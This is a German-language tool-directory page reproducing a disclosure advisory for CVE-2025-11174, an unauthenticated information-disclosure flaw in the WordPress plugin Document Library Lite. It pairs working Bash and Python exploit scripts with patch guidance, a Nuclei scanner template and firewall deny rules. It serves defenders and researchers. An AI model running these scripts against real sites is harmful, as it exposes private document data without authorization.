Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-11174 — Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174 | Kitploit
Tools/GitHubGitHub/snailsploit/cve-2025-11174
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringWeb SecurityPenetration Testing
GitHubsnailsploit/cve-2025-11174

CVE-2025-11174

Document Library Lite <= 1.1.6 - Missing Authorization to Sensitive Information Exposure | CVE-2025-11174

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-11174: Nicht authentifizierte Offenlegung von Informationen im WordPress-Plugin Document Library Lite

CVE CVSS Score WordPress Plugin CWE-862 Wordfence

Keywords: CVE-2025-11174, Document Library Lite vulnerability, information disclosure, WordPress security, unauthenticated AJAX exploit, WordPress plugin vulnerability, CWE-862, WordPress document plugin security, authorization bypass, WordPress CVE 2025

Inhaltsverzeichnis

  • Übersicht
  • Details zur Schwachstelle
  • Technische Analyse
  • Angriffsvektor
  • Proof of Concept
  • Anleitung zur Behebung
  • Erkennung
  • CVSS-Metriken
  • Referenzen
  • Danksagungen
  • Sicherheitskontakt

Übersicht

Sicherheitslücke zur Offenlegung von Informationen im WordPress-Plugin Document Library Lite (CVE-2025-11174) – Ein Sicherheitsfehler, der nicht authentifizierten Zugriff auf sensible Dokumentdaten im Document-Library-Plugin von WordPress ermöglicht.

Es wurde eine kritische Schwachstelle in der Autorisierungsumgehung im WordPress-Plugin Document Library Lite entdeckt, die es nicht authentifizierten Angreifern erlaubt, auf sensible Dokumentinformationen zuzugreifen, ohne ordnungsgemäße Authentifizierung.

Entdeckt von: Kai Aizen & Avraham Shemesh (SnailSploit)
Veröffentlicht: 1. November 2025
CVSS-Score: 5.3 (Mittel)
CWE: CWE-862 – Fehlende Autorisierung
Plugin: Document Library Lite
Anbieter: Barn2 Plugins
Angriffstyp: Nicht authentifizierte Offenlegung von Informationen
Erforderliche Berechtigungen: Keine (nicht authentifizierter Angriff)

Details zur Schwachstelle

Beschreibung

Das Plugin Document Library Lite für WordPress enthält eine Schwachstelle durch fehlerhafte Autorisierung in allen Versionen bis einschließlich 1.1.6. Das Plugin legt eine nicht authentifizierte AJAX-Aktion dll_load_posts offen, die eine JSON-Tabelle mit Dokumentdaten zurückgibt, ohne Nonce- oder Berechtigungsprüfungen durchzuführen.

Auswirkung

Diese Schwachstelle ermöglicht es nicht authentifizierten Angreifern:

  • Auf Dokumentmetadaten ohne Autorisierung zuzugreifen
  • Dokumentlisten abzurufen, die eigentlich eingeschränkt sein sollten
  • Dokumentinformationen einzusehen, die nur für authentifizierte Benutzer bestimmt sind
  • Im Document Library gespeicherte Dokumente aufzulisten

Hinweis: Der CVSS-Score von 5.3 (mittlerer Schweregrad) spiegelt eine begrenzte Offenlegung von Informationen wider. Während die Schwachstelle nicht authentifizierten Zugriff auf Dokumentdaten erlaubt, wird die Auswirkung auf die Vertraulichkeit als Niedrig eingestuft, ohne Auswirkungen auf Integrität oder Verfügbarkeit.

Betroffene Versionen

  • Verwundbar: Alle Versionen ≤ 1.1.6
  • Behoben: Version 1.1.7 und höher

CVSS v3.1 Metriken

root@kitploit:~
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

CVSS v3.1 Aufschlüsselung:

  • Angriffsvektor (AV): Netzwerk – Die Schwachstelle kann remote über ein Netzwerk ausgenutzt werden
  • Angriffskomplexität (AC): Niedrig – Es sind keine besonderen Bedingungen für die Ausnutzung erforderlich
  • Erforderliche Berechtigungen (PR): Keine – Es ist keine Authentifizierung oder Berechtigung erforderlich
  • Benutzerinteraktion (UI): Keine – Der Exploit funktioniert ohne Benutzerinteraktion
  • Auswirkungsbereich (S): Unverändert – Die Schwachstelle betrifft nur die verwundbare Komponente
  • Vertraulichkeitsauswirkung (C): Niedrig – Begrenzte Offenlegung von Informationen
  • Integritätsauswirkung (I): Keine – Keine Integritätsauswirkung
  • Verfügbarkeitsauswirkung (A): Keine – Keine Verfügbarkeitsauswirkung

Technische Einzelheiten

Ursache der Schwachstelle

Die AJAX-Aktion dll_load_posts ist ohne ordnungsgemäße Authentifizierungs- oder Autorisierungsprüfungen registriert:

root@kitploit:~
// Verwundbares Code-Muster (vereinfacht)
add_action('wp_ajax_nopriv_dll_load_posts', 'dll_load_posts_callback');

Das Präfix wp_ajax_nopriv_ zeigt an, dass diese Aktion für nicht authentifizierte Benutzer zugänglich ist, und die Callback-Funktion implementiert keine:

  • Nonce-Überprüfung
  • Berechtigungsprüfungen
  • Benutzerauthentifizierungsvalidierung

Angriffsvektor

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=dll_load_posts

Die Schwachstelle kann über den WordPress-Endpunkt admin-ajax.php ohne Authentifizierung ausgenutzt werden.

Proof of Concept

⚠️ Nur für Bildungszwecke und autorisierte Tests

Bash PoC

root@kitploit:~
#!/bin/bash
# CVE-2025-11174 PoC

TARGET_URL="$1"

if [ -z "$TARGET_URL" ]; then
    echo "Usage: $0 <target_url>"
    echo "Example: $0 https://example.com"
    exit 1
fi

echo "[*] CVE-2025-11174 - Document Library Lite Information Disclosure PoC"
echo "[*] Target: $TARGET_URL"
echo ""

# Send request to vulnerable AJAX endpoint
curl -s -X POST "$TARGET_URL/wp-admin/admin-ajax.php" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -d "action=dll_load_posts" \
  | python3 -m json.tool

echo ""
echo "[+] If you see document data above, the site is vulnerable!"

Python PoC

root@kitploit:~
#!/usr/bin/env python3
"""
CVE-2025-11174 - Document Library Lite Information Disclosure PoC
For educational and authorized testing purposes only
"""

import requests
import sys
import json

def exploit(target_url):
    ajax_url = f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php"
    
    print(f"[*] CVE-2025-11174 - Document Library Lite PoC")
    print(f"[*] Target: {target_url}")
    print(f"[*] AJAX Endpoint: {ajax_url}\n")
    
    data = {'action': 'dll_load_posts'}
    
    try:
        response = requests.post(ajax_url, data=data, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful!\n")
            try:
                json_data = response.json()
                print("[+] Retrieved document data:")
                print(json.dumps(json_data, indent=2))
                print("\n[!] Site is VULNERABLE to CVE-2025-11174")
            except json.JSONDecodeError:
                print("[-] No JSON response received")
                print(f"Response: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            
    except requests.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit(target)

Abhilfe

Für Seitenadministratoren

Sofortmaßnahme erforderlich:

  1. Aktualisieren Sie Document Library Lite sofort auf Version 1.1.7 oder höher
  2. Überprüfen Sie die Zugriffsprotokolle Ihrer Website auf verdächtige POST-Anfragen an admin-ajax.php mit action=dll_load_posts
  3. Wenn Sie nicht sofort aktualisieren können, erwägen Sie, das Plugin vorübergehend zu deaktivieren

Update-Anleitung

Über WordPress Admin:

  1. Navigieren Sie im WordPress-Admin zu Plugins > Installierte Plugins
  2. Suchen Sie "Document Library Lite"
  3. Klicken Sie auf Jetzt aktualisieren, um auf Version 1.1.7 oder höher zu aktualisieren
  4. Überprüfen Sie, ob das Update erfolgreich war

Mit WP-CLI:

root@kitploit:~
wp plugin update document-library-lite

Für Plugin-Entwickler

Stellen Sie sicher, dass alle AJAX-Handler ordnungsgemäße Sicherheitskontrollen implementieren:

root@kitploit:~
// Beispiel für ordnungsgemäße AJAX-Sicherheit
add_action('wp_ajax_dll_load_posts', 'dll_load_posts_callback');

function dll_load_posts_callback() {
    // Nonce überprüfen
    if (!wp_verify_nonce($_POST['nonce'], 'dll_nonce')) {
        wp_die('Invalid nonce');
    }
    
    // Berechtigungen prüfen
    if (!current_user_can('read')) {
        wp_send_json_error('Insufficient permissions');
        wp_die();
    }
    
    // Ihr sicherer Code hier
}

Erkennung

WordPress Plugin-Prüfung

root@kitploit:~
# Prüfen, ob eine verwundbare Version installiert ist
wp plugin list | grep -i "document-library-lite"

Regeln für Sicherheitsscanner

Nuclei-Vorlage:

root@kitploit:~
id: CVE-2025-11174

info:
  name: Document Library Lite - Unauthenticated Information Disclosure
  author: security-research
  severity: medium
  description: Document Library Lite plugin for WordPress is vulnerable to information disclosure
  reference:
    - https://github.com/[your-repo]/CVE-2025-11174
  tags: cve,cve2025,wordpress,wp-plugin,unauth

requests:
  - method: POST
    path:
      - "{{BaseURL}}/wp-admin/admin-ajax.php"
    
    body: "action=dll_load_posts"
    
    matchers-condition: and
    matchers:
      - type: word
        words:
          - "data"
          - "recordsTotal"
        condition: and
      
      - type: status
        status:
          - 200

Web Application Firewall-Regeln

ModSecurity-Regel:

root@kitploit:~
SecRule REQUEST_URI "@contains /wp-admin/admin-ajax.php" \
    "chain,id:1000001,phase:2,t:none,t:urlDecodeUni,t:normalizePathWin,\
    log,deny,status:403,msg:'CVE-2025-11174 Exploit Attempt'"
    SecRule ARGS:action "@streq dll_load_posts" "t:none"

Nginx/OpenResty-Regel:

root@kitploit:~
if ($request_uri ~* "admin-ajax\.php") {
    if ($args ~* "action=dll_load_posts") {
        return 403;
    }
}

Zeitplan

  • 1. November 2025 – Schwachstelle öffentlich bekannt gegeben
  • 1. November 2025 – CVE-Eintrag veröffentlicht
  • November 2025 – Patch veröffentlicht (Version 1.1.7)

Referenzen

  • CVE-2025-11174 - CVE.org
  • GitHub Advisory Database
  • Wordfence Intelligence
  • WordPress Plugin Directory

Danksagungen

Forscher:

  • Avraham Shemesh
  • Kai Aizen - SnailSploit

Offenlegungsprozess: Koordinierte Offenlegung

Haftungsausschluss

Diese Informationen werden ausschließlich zu Sicherheitsforschungs- und Verteidigungszwecken bereitgestellt. Jegliche Ausnutzung dieser Sicherheitslücke zu böswilligen Zwecken ist illegal und unethisch. Holen Sie stets eine ordnungsgemäße Genehmigung ein, bevor Sie Systeme testen, die Ihnen nicht gehören.

Kontakt

Bei Fragen oder weiteren Informationen zu dieser Schwachstelle:

  • E-Mail: [email protected]
  • Webseite: snailsploit.com
  • Organisation: SnailSploit Security Research

Zuletzt aktualisiert: 2. November 2025


📚 Dokumentation & Autor

Der vollständige Bericht, die Methodik und die zugehörigen Forschungsarbeiten dieses Projekts finden Sie unter:

https://snailsploit.com/security-research/cves/cve-2025-11174/

Erstellt von Kai Aizen — unabhängiger Offensive-Security-Forscher.

snailsploit.com · Forschung · Frameworks · GitHub · LinkedIn · ResearchGate · X/Twitter

Gleicher Angriff. Anderes Substrat.

Tool herunterladen
MetrikWert
AngriffsvektorNetzwerk (AV:N)
AngriffskomplexitätNiedrig (AC:L)
Erforderliche BerechtigungenKeine (PR:N)
BenutzerinteraktionKeine (UI:N)
AuswirkungsbereichUnverändert (S:U)
VertraulichkeitNiedrig (C:L)
IntegritätKeine (I:N)
VerfügbarkeitKeine (A:N)